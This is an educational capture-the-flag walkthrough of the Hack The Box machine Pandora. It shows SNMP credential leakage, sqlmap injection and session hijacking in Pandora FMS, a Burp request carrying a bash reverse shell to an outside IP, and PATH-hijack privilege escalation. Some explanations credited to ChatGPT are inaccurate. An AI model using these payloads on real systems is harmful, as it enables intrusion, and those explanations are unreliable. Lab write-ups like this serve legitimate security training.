Pandora HTB Machine Educational Walkthrough

Please note that as a learning experiment, some of the explanations in the writeup were written by ChatGPT. In those explanations you will see (Defined by ChatGPT) appended.

Pandora is an Ubuntu Linux box hosting a network monitoring web application called Pandora FMS. We started off on this box by spawning it from the Hack The Box interface. Hack The Box is a Cybersecurity Training platform that makes excellent training content, labs, CTFs (Capture The Flag experiences) and challenges to help anyone upskill.

External Enumeration

We then proceeded to start our external enumeration of the target using the tool nmap.

sudo nmap -sC -sV -Pn 10.10.11.136
 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 03:30 GMT
Nmap scan report for 10.10.11.136
Host is up (0.100s latency).
Not shown: 998 closed tcp ports (reset)
PORT?STATE SERVICE VERSION
22/tcp open ssh??OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|?3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|?256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http?Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds        

We discovered SSH (22) and HTTP (80) running on the target. SSH (short for Secure Shell) is used to remotely connect to the device's command line using an encrypted channel of communications. HTTP (short for Hyper-Text Transfer Protocol) indicates that this target is also hosting a website, therefore acting as a Web Server.

UDP Enumeration

In our last nmap scan we didn't tell nmap to scan UDP ports. We can do this using the -sU option.

sudo nmap -sU 10.10.11.136
 
PORT??STATE????SERVICE???REASON??????VERSION
7/udp??closed???echo?????port-unreach ttl 63
9/udp??closed???discard???port-unreach ttl 63
17/udp?open|filtered qotd?????no-response
19/udp?closed???chargen???port-unreach ttl 63
49/udp?open|filtered tcpwrapped??no-response
53/udp?open|filtered domain????no-response
67/udp?open|filtered tcpwrapped??no-response
68/udp?closed???dhcpc????port-unreach ttl 63
69/udp?open|filtered tftp?????no-response
80/udp?closed???http?????port-unreach ttl 63
88/udp?closed???kerberos-sec?port-unreach ttl 63
111/udp?open|filtered rpcbind???no-response
120/udp?closed???cfdptkt???port-unreach ttl 63
123/udp?open|filtered ntp?????no-response
135/udp?open|filtered msrpc????no-response
136/udp?closed???profile???port-unreach ttl 63
137/udp?closed???netbios-ns??port-unreach ttl 63
138/udp?open|filtered tcpwrapped??no-response
139/udp?closed???netbios-ssn?port-unreach ttl 63
158/udp?closed???pcmail-srv??port-unreach ttl 63
161/udp?open????snmp?????udp-response ttl 63 SNMPv1 server (public)
162/udp?open|filtered tcpwrapped??no-response
177/udp?open|filtered xdmcp????no-response
427/udp?closed???svrloc????port-unreach ttl 63
443/udp?open|filtered https????no-response
445/udp?closed???microsoft-ds?port-unreach ttl 63
497/udp?closed???retrospect??port-unreach ttl 63
500/udp?closed???isakmp????port-unreach ttl 63
514/udp?open|filtered tcpwrapped??no-response
515/udp?open|filtered tcpwrapped??no-response
518/udp?closed???ntalk????port-unreach ttl 63
520/udp?closed???route????port-unreach ttl 63
593/udp?open|filtered tcpwrapped??no-response
623/udp?open|filtered asf-rmcp???no-response
626/udp?closed???serialnumberd port-unreach ttl 63
631/udp?open|filtered tcpwrapped??no-response
996/udp?open|filtered tcpwrapped??no-response
997/udp?closed???maitrd????port-unreach ttl 63
998/udp?open|filtered tcpwrapped??no-response
999/udp?closed???applix????port-unreach ttl 63
1022/udp closed???exp2?????port-unreach ttl 63
1023/udp closed???unknown???port-unreach ttl 63
1025/udp closed???blackjack??port-unreach ttl 63
1026/udp closed???win-rpc???port-unreach ttl 63
1027/udp closed???unknown???port-unreach ttl 63
1028/udp open|filtered tcpwrapped??no-response
1029/udp closed???solid-mux??port-unreach ttl 63
1030/udp open|filtered tcpwrapped??no-response
1433/udp closed???ms-sql-s???port-unreach ttl 63
1434/udp open|filtered ms-sql-m???no-response
1645/udp closed???radius????port-unreach ttl 63
1646/udp open|filtered tcpwrapped??no-response
1701/udp closed???L2TP?????port-unreach ttl 63
1718/udp closed???h225gatedisc?port-unreach ttl 63
1719/udp closed???h323gatestat?port-unreach ttl 63
1812/udp open|filtered tcpwrapped??no-response
1813/udp open|filtered tcpwrapped??no-response
1900/udp closed???upnp?????port-unreach ttl 63
2000/udp closed???cisco-sccp??port-unreach ttl 63
2048/udp closed???dls-monitor?port-unreach ttl 63
2049/udp closed???nfs?????port-unreach ttl 63
2222/udp closed???msantipiracy?port-unreach ttl 63
2223/udp closed???rockwell-csp2 port-unreach ttl 63
3283/udp closed???netassistant?port-unreach ttl 63
3456/udp open|filtered tcpwrapped??no-response
3703/udp open|filtered tcpwrapped??no-response
4444/udp closed???krb524????port-unreach ttl 63
4500/udp closed???nat-t-ike??port-unreach ttl 63
5000/udp open|filtered tcpwrapped??no-response
5060/udp open|filtered sip?????no-response
5353/udp closed???zeroconf???port-unreach ttl 63
5632/udp open|filtered pcanywherestat no-response
9200/udp closed???wap-wsp???port-unreach ttl 63
10000/udp closed???ndmp?????port-unreach ttl 63
17185/udp open|filtered tcpwrapped??no-response
20031/udp open|filtered tcpwrapped??no-response
30718/udp closed???unknown???port-unreach ttl 63
31337/udp open|filtered BackOrifice?no-response
32768/udp open|filtered omad?????no-response
32769/udp closed???filenet-rpc?port-unreach ttl 63
32771/udp closed???sometimes-rpc6 port-unreach ttl 63
32815/udp closed???unknown???port-unreach ttl 63
33281/udp closed???unknown???port-unreach ttl 63
49152/udp closed???unknown???port-unreach ttl 63
49153/udp closed???unknown???port-unreach ttl 63
49154/udp closed???unknown???port-unreach ttl 63
49156/udp open|filtered unknown???no-response
49181/udp closed???unknown???port-unreach ttl 63
49182/udp closed???unknown???port-unreach ttl 63
49185/udp closed???unknown???port-unreach ttl 63
49186/udp closed???unknown???port-unreach ttl 63
49188/udp open|filtered tcpwrapped??no-response
49190/udp open|filtered tcpwrapped??no-response
49191/udp closed???unknown???port-unreach ttl 63
49192/udp open|filtered tcpwrapped??no-response
49193/udp open|filtered tcpwrapped??no-response
49194/udp open|filtered tcpwrapped??no-response
49200/udp closed???unknown???port-unreach ttl 63
49201/udp closed???unknown???port-unreach ttl 63
65024/udp closed???unknown???port-unreach ttl 63        

The SNMP (short for Simple Network Management Protocol) service/protocol is running on this device to facilitate management communications between network devices (switches, routers, servers, etc...) for the purpose of monitoring. We decided to enumerate SNMP. We noticed that SNMPv1 is used and the community string is public.

SNMP Gives Us Creds

We found some credentials by using snmpwalk. An SNMP walk is a process for querying a network device for a list of all the values that are available in a particular branch of the device's management information tree (MIT). This is useful for gathering information about the device's configuration and performance, as well as for monitoring the device's behavior over time. Snmpwalk is the tool we used to do this (Defined by ChatGPT) .

snmpwalk -v2c 10.10.11.136 -c public
 
<SNIP>
iso.3.6.1.2.1.25.4.2.1.5.960 = ""
iso.3.6.1.2.1.25.4.2.1.5.1037 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1039 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1041 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1131 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1135 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1150 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1199 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1200 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1201 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1288 = ""
         

We were able to use the discovered credentials (daniel:HotelBabylon23) to login to the target over SSH.

ssh [email protected]
 
daniel@pandora:~$         

Once we got access we began internal host enumeration.

Internal Host Enumeration (Linux Privilege Escalation)

After running manual enumeration (searching through files, sudo -l, etc..) and LinPEAS (thanks again Carlos). We found an Apache2 configuration file (pandora.conf) for a website being hosted. This is using Apache vHosts (virtual host) to host the web site. Here is a look at the pandora.conf file:

</VirtualHost>
lrwxrwxrwx 1 root root 31 Dec 3 2021 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf
<VirtualHost localhost:80>
 ServerAdmin [email protected]
 ServerName pandora.panda.htb
 DocumentRoot /var/www/pandora
 AssignUserID matt matt
 <Directory /var/www/pandora>
?AllowOverride All
 </Directory>
 ErrorLog /var/log/apache2/error.log
 CustomLog /var/log/apache2/access.log combined
</VirtualHost>
         

Here is an explanation of the pandora.conf file as defined by ChatGPT :

1. </VirtualHost>: This line closes a <VirtualHost> block that was previously opened in the code. It indicates the end of the configuration settings for the virtual host.
2. lrwxrwxrwx 1 root root 31 Dec 3 2021 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf: This line shows the symbolic link between the pandora.conf configuration file in the /etc/apache2/sites-enabled directory and the pandora.conf file in the /etc/apache2/sites-available directory. This allows the Apache web server to use the configuration settings in the /etc/apache2/sites-available/pandora.conf file for the virtual host.
3. <VirtualHost localhost:80>: This line opens a <VirtualHost> block and specifies that the virtual host will be accessible at the localhost address on port 80.
4. ServerAdmin [email protected]: This line specifies the email address of the server administrator, which will be used in any error messages or other communications from the server.
5. ServerName pandora.panda.htb: This line specifies the hostname of the server, which will be used in any URLs or other references to the server.
6. DocumentRoot /var/www/pandora: This line specifies the directory on the server that will contain the files for the virtual host. This is where the web server will look for files to serve when a client requests a page from the virtual host.
7. AssignUserID matt matt: This line assigns the user matt and the group matt to the virtual host. This means that any files created or modified by the web server on behalf of the virtual host will be owned by the matt user and group.
8. <Directory /var/www/pandora>: This line opens a <Directory> block and specifies the directory that will be affected by the configuration settings within the block. In this case, the settings within the block will apply to the /var/www/pandora directory.
9. AllowOverride All: This line specifies that all configuration directives in .htaccess files in the directory (and its subdirectories) should be allowed to override the settings specified in the main Apache configuration file(s). This can be useful for allowing individual users or applications to customize the web server's behavior without modifying the main configuration files.
10. </Directory>: This line closes the <Directory> block opened in line 8.
11. ErrorLog /var/log/apache2/error.log: This line specifies the location of the error log file for the virtual host. Any errors or other messages generated by the web server on behalf of the virtual host will be written to this log file.
12. CustomLog /var/log/apache2/access.log combined: This line specifies the location of the access log file for the virtual host. This log file will record details about each request made to the virtual host, including the time of the request, the IP address of the client, and the requested resource. The combined format specifies that the log file should include the combined access and error log data.

Upon discovering a sub-domain we added this entry to /etc/hosts so we could resolve the site:

10.10.11.136 pandora.panda.htb        

Setting up the Pivot/Proxy

ssh -D 9050 [email protected]
 
[email protected]'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation: https://help.ubuntu.com
 * Management:??https://landscape.canonical.com
 * Support:???https://ubuntu.com/advantage
 
 System information as of Tue 6 Dec 04:41:48 UTC 2022
 
 System load:?????0.0
 Usage of /:?????63.0% of 4.87GB
 Memory usage:????14%
 Swap usage:?????0%
 Processes:??????233
 Users logged in:???0
 IPv4 address for eth0: 10.10.11.136
 IPv6 address for eth0: dead:beef::250:56ff:feb9:cf72
 
 => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Tue Dec 6 04:15:13 2022 from 10.10.14.16
daniel@pandora:~$        

The command ssh -D 9050 [email protected] is used to establish an SSH tunnel to the host with the IP address 10.10.11.136 using the username daniel. The -D option specifies that the tunnel will be a dynamic port forwarding tunnel, which means that it will listen on a local port (in this case, port 9050) and forward all incoming connections to the remote host.

This can be useful for securely forwarding traffic from your local machine to the remote host, for example, to bypass a firewall or access a network service that is only available on the remote network. When you run this command, the ssh tool will connect to the remote host and establish the tunnel, allowing you to route traffic to the remote host via the tunnel. You can then use the local port specified in the command (in this case, port 9050) as a proxy to access services on the remote host.

For example, you could configure your web browser to use a SOCKS proxy on localhost:9050 to route all its traffic through the SSH tunnel, allowing you to access services on the remote host as if you were directly connected to the network. This can provide an additional layer of security and anonymity when accessing the remote network (Explained by ChatGPT).

Attempting to login with Daniel results in this message:

We then attempt to exploit the SQL injection vulnerability using SQLmap based on the vulnerability described in Sonar Source's blog post

Database Enumeration

The proxychains command is used to run a command (in this case sqlmap) through a proxy server. This allows the user to connect to the target URL (in this case https://127.0.0.1/pandora_console/include/chart_generator.php?session_id='') through the proxy server, which can be useful for hiding the user's IP address or for bypassing network restrictions.

The sqlmap command is a tool used for detecting and exploiting SQL injection vulnerabilities in web applications. In this case, the --url option is used to specify the target URL, which is the URL of a PHP script on the Pandora FMS console. The --current-db option tells sqlmap to retrieve the name of the current database on the server.

In summary, this command runs sqlmap through a proxy server and uses it to retrieve the name of the current database on the Pandora FMS server at the specified URL. It is important to note that running this command without permission from the owner of the server could be illegal and could result in serious consequences. It is always important to follow ethical hacking guidelines and obtain permission before conducting any security testing (Explained by ChatGPT).

proxychains sqlmap --url="https://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" --
current-db
 
S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:36:01] [INFO] heuristic (basic) test shows that GET parameter 'session_id' might be injectable (possible DBMS: 'MySQL')
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:36:01] [INFO] heuristic (XSS) test shows that GET parameter 'session_id' might be vulnerable to cross-site scripting (XSS) attacks
[05:36:01] [INFO] testing for SQL injection on GET parameter 'session_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
[05:37:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
GET parameter 'session_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:41:18] [INFO] fetching current database
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:80-<><>-OK
[05:41:18] [WARNING] reflective value(s) found and filtering out
[05:41:18] [INFO] retrieved: 'pandora'
current database: 'pandora'
[05:41:18] [INFO] fetched data logged to text files under '/home/htb-ltnbob/.local/share/sqlmap/output/127.0.0.1'
$ proxychains sqlmap --url="https://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D
pandora --tables
 
Database: pandora
[178 tables]
+------------------------------------+
| taddress?????????????|
| taddress_agent??????????|
| tagent_access??????????|
| tagent_custom_data????????|
| tagent_custom_fields???????|
| tagent_custom_fields_filter???|
| tagent_module_inventory?????|
| tagent_module_log????????|
| tagent_repository????????|
| tagent_secondary_group??????|
| tagente?????????????|
| tagente_datos??????????|
| tagente_datos_inc????????|
| tagente_datos_inventory?????|
| tagente_datos_log4x???????|
| tagente_datos_string???????|
| tagente_estado??????????|
| tagente_modulo??????????|
| talert_actions??????????|
| talert_commands?????????|
| talert_snmp???????????|
| talert_snmp_action????????|
| talert_special_days???????|
| talert_template_module_actions??|
| talert_template_modules?????|
| talert_templates?????????|
| tattachment???????????|
| tautoconfig???????????|
| tautoconfig_actions???????|
| tautoconfig_rules????????|
| tcategory????????????|
| tcluster?????????????|
| tcluster_agent??????????|
| tcluster_item??????????|
| tcollection???????????|
| tconfig?????????????|
| tconfig_os????????????|
| tcontainer????????????|
| tcontainer_item?????????|
| tcredential_store????????|
| tdashboard????????????|
| tdatabase????????????|
| tdeployment_hosts????????|
| tevent_alert???????????|
| tevent_alert_action???????|
| tevent_custom_field???????|
| tevent_extended?????????|
| tevent_filter??????????|
| tevent_response?????????|
| tevent_rule???????????|
| tevento?????????????|
| textension_translate_string???|
| tfiles_repo???????????|
| tfiles_repo_group????????|
| tgis_data_history????????|
| tgis_data_status?????????|
| tgis_map?????????????|
| tgis_map_connection???????|
| tgis_map_has_tgis_map_con????|
| tgis_map_layer??????????|
| tgis_map_layer_groups??????|
| tgis_map_layer_has_tagente????|
| tgraph??????????????|
| tgraph_source??????????|
| tgraph_source_template??????|
| tgraph_template?????????|
| tgroup_stat???????????|
| tgrupo??????????????|
| tincidencia???????????|
| titem??????????????|
| tlanguage????????????|
| tlayout?????????????|
| tlayout_data???????????|
| tlayout_template?????????|
| tlayout_template_data??????|
| tlink??????????????|
| tlocal_component?????????|
| tlog_graph_models????????|
| tmap???????????????|
| tmensajes????????????|
| tmetaconsole_agent????????|
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event????????|
| tmetaconsole_event_history????|
| tmetaconsole_setup????????|
| tmigration_module_queue?????|
| tmigration_queue?????????|
| tmodule?????????????|
| tmodule_group??????????|
| tmodule_inventory????????|
| tmodule_relationship???????|
| tmodule_synth??????????|
| tnetflow_filter?????????|
| tnetflow_report?????????|
| tnetflow_report_content?????|
| tnetwork_component????????|
| tnetwork_component_group?????|
| tnetwork_map???????????|
| tnetwork_matrix?????????|
| tnetwork_profile?????????|
| tnetwork_profile_component????|
| tnetworkmap_ent_rel_nodes????|
| tnetworkmap_enterprise??????|
| tnetworkmap_enterprise_nodes???|
| tnews??????????????|
| tnota??????????????|
| tnotification_group???????|
| tnotification_source???????|
| tnotification_source_group????|
| tnotification_source_group_user?|
| tnotification_source_user????|
| tnotification_user????????|
| torigen?????????????|
| tpassword_history????????|
| tperfil?????????????|
| tphase??????????????|
| tplanned_downtime????????|
| tplanned_downtime_agents?????|
| tplanned_downtime_modules????|
| tplugin?????????????|
| tpolicies????????????|
| tpolicy_agents??????????|
| tpolicy_alerts??????????|
| tpolicy_alerts_actions??????|
| tpolicy_collections???????|
| tpolicy_groups??????????|
| tpolicy_modules?????????|
| tpolicy_modules_inventory????|
| tpolicy_plugins?????????|
| tpolicy_queue??????????|
| tprofile_view??????????|
| tprovisioning??????????|
| tprovisioning_rules???????|
| trecon_script??????????|
| trecon_task???????????|
| trel_item????????????|
| tremote_command?????????|
| tremote_command_target??????|
| treport?????????????|
| treport_content?????????|
| treport_content_item???????|
| treport_content_item_temp????|
| treport_content_sla_com_temp???|
| treport_content_sla_combined???|
| treport_content_template?????|
| treport_custom_sql????????|
| treport_template?????????|
| treset_pass???????????|
| treset_pass_history???????|
| tserver?????????????|
| tserver_export??????????|
| tserver_export_data???????|
| tservice?????????????|
| tservice_element?????????|
| tsesion?????????????|
| tsesion_extended?????????|
| tsessions_php??????????|
| tskin??????????????|
| tsnmp_filter???????????|
| ttag???????????????|
| ttag_module???????????|
| ttag_policy_module????????|
| ttipo_modulo???????????|
| ttransaction???????????|
| ttrap??????????????|
| ttrap_custom_values???????|
| tupdate?????????????|
| tupdate_journal?????????|
| tupdate_package?????????|
| tupdate_settings?????????|
| tuser_double_auth????????|
| tuser_task????????????|
| tuser_task_scheduled???????|
| tusuario?????????????|
| tusuario_perfil?????????|
| tvisual_console_elements_cache??|
| twidget?????????????|
| twidget_dashboard????????|
+------------------------------------+
$ proxychains sqlmap --url="https://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -
Ttsessions_php --dump
 
Database: pandora
Table: tsessions_php
[46 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session????????| data???????????????????????| last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";?????????????| 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL???????????????????????| 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL???????????????????????| 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL???????????????????????| 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";?????????????| 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL???????????????????????| 1638795380 |
| 3o0ft0hh97f63a0ccuagddbgv9 | NULL???????????????????????| 1670305367 |
| 4f51mju7kcuonuqor3876n8o02 | NULL???????????????????????| 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";?????????????| 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL???????????????????????| 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL???????????????????????| 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";?????????????| 1638281946 |
| 5mkjqefvqsv329mdujt4n6oll2 | id_usuario|s:6:"daniel";?????????????| 1670305086 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";?????????????| 1641195617 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL???????????????????????| 1623957150 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";?????????????| 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL???????????????????????| 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";?????????????| 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL???????????????????????| 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";?????????????| 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL???????????????????????| 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL???????????????????????| 1638786277 |
| ebplbdaru16u2a2e449h2akhmc | NULL???????????????????????| 1670302254 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";?????????????| 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL???????????????????????| 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL???????????????????????| 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";?????????????| 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL???????????????????????| 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL???????????????????????| 1638540345 |
| hr4mas6qis9bv434h89pr2lho9 | id_usuario|s:6:"daniel";?????????????| 1670297215 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";?????????????| 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";?????????????| 1638456173 |
| kkkvfd4sgalbjracetjdeik0v7 | NULL???????????????????????| 1670305476 |
| kp90bu1mlclbaenaljem590ik3 | NULL???????????????????????| 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL???????????????????????| 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";?????????????| 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";?????????????| 1637667827 |
| or55gnvv41ck6tb9j63oq01l0q | NULL???????????????????????| 1670304499 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";?????????????| 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL???????????????????????| 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL???????????????????????| 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";?????????????| 1638889082 |
| ruo2v3o9bg97aitn231g5e7scc | NULL???????????????????????| 1670305279 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";?????????????| 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";?????????????| 1638793297 |
+----------------------------+-----------------------------------------------------+-------------+        

We can login with matt's session id then access the main page and be authenticated as matt.

https://127.0.0.1/pandora_console/include/chart_generator.php?session_id=g4e01qdgk36mfdh90hvcc54umq        

Privilege Escalation & Reverse Shell through Burp

First we needed to configure proxy settings on Burp. Here are those configurations:

We are able to get remote code execution (RCE) by capturing an HTTP post request to Events once authenticated and using Burp to add a payload to the request. Here is the POST request used in Burp.

POST /pandora_console/ajax.php HTTP/1.1
Host: localhost
Content-Length: 78
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/pandora_console/index.php?sec=eventos&sec2=operation/events/events
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq
Connection: close
 
page=include/ajax/events&perform_event_response=10000000&target=bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.18/1234+0>%261"&response_id=1        

We got a shell:

matt@pandora:/var/www/pandora/pandora_console$         

We generated an ssh key using:

ssh-keygen        

On the target we need to make sure that id_rsa.pub (public key) is added to the authorized keys file. We then cat the id_rsa (private key), we could also download it onto our attack host so we can use it to connect as Matt. Remember the permissions should be set on that key to 600 for us to be able to use it to connect.

sudo chmod 600 <nameofKeyFile>        

Once the permissions are set we can connect using just the key:

ssh -i <nameofKeyFile> matt@<ipAddressOfTarget>        

Escalation To Root

We discovered a file called pandora_backup at:

/usr/bin/pandora_backup
FMS Backup UtilityNow attempting to backup PandoraFMS clienttar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*Backup failed!
Check your permissions!Backup successful!Terminating program        

When running pandora_backup we found that tar is referenced using a relative path. This could be exploited through a Path Hijacking attack. A file named tar was created that was actually a bash script spawning a shell as root upon running pandora_backup. See the commands run below:

matt@pandora:/tmp$ cat tar
 
#!/bin/bash
 
bash
 
matt@pandora:/tmp$ chmod +x tar 
matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp#         

This would not work when the shell was spawned from the web server, SSH access was needed.

root@pandora:/etc/apache2/sites-available# cat pandora.conf 
<VirtualHost localhost:80>
 ServerAdmin [email protected]
 ServerName pandora.panda.htb
 DocumentRoot /var/www/pandora
 AssignUserID matt matt
 <Directory /var/www/pandora>
?AllowOverride All
 </Directory>
 ErrorLog /var/log/apache2/error.log
 CustomLog /var/log/apache2/access.log combined
</VirtualHost>
root@pandora:/etc/apache2/sites-available# ls -la /usr/bin/pandora_backup 
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup        

The AssignUserID matt matt directive in the given <VirtualHost> block restricts the suid binary /usr/bin/pandora_backup in the following way:

The AssignUserID directive assigns the user matt and the group matt to the virtual host. This means that any files created or modified by the web server on behalf of the virtual host will be owned by the matt user and group.

The ls -la command shows that the /usr/bin/pandora_backup binary has the suid permission set, which means that it will be executed with the permissions of the file's owner (in this case, the root user) rather than the permissions of the user who runs the binary.

However, because the AssignUserID directive assigns the matt user and group to the virtual host, the web server will not be able to access the /usr/bin/pandora_backup binary with the root user's permissions. Instead, it will be forced to access the binary with the matt user's permissions, which are less privileged.

This restriction can help prevent the web server from accidentally or maliciously using the /usr/bin/pandora_backup binary in a way that could compromise the security of the system. It also ensures that any actions taken by the binary on behalf of the virtual host are restricted to the permissions of the matt user, rather than being able to execute with the more privileged root user's permissions.

(Defined by ChatGPT)

Kudos to OpenAI and ChatGPT for the Explanations

Great job OpenAI team! ChatGPT is a high quality learning companion. I found in the process of making this writeup and conducting the live stream, ChatGPT was able to explain concepts more concisely than myself. It taught me something about Apache configuration files. I am looking forward to what the future brings and what these tools enable us humans to learn, teach & create.

Keep Learning!

P.S. The original live stream that inspired this post is on Twitch https://www.twitch.tv/videos/1674667401

Learning Objectives:

• IP Addressing
• Enumeration with Nmap
• TCP & UDP
• Linux
• SNMP
• Authentication
• SSH & Dynamic port forwarding
• SSH key-based authentication
• Bash scripting
• Linux Command Line Navigation
• Documentation
• ChatGPT as a learning companion
• Apache virtual hosts
• Sub domain enumeration
• Linux Privilege Escalation
• Pivoting & Proxy chaining
• SOCKS Proxies
• Configuring Foxy Proxy
• Working with Burp Suite Community Edition
• Researching CVEs
• Database Enumeration
• SQL Injection (Automated & Manual)
• SQLMap
• Web application penetration testing
• Session IDs associated with web login sessions
• Reverse Shells
• Linux File Permissions
• Path Hijacking
• Absolute and relative paths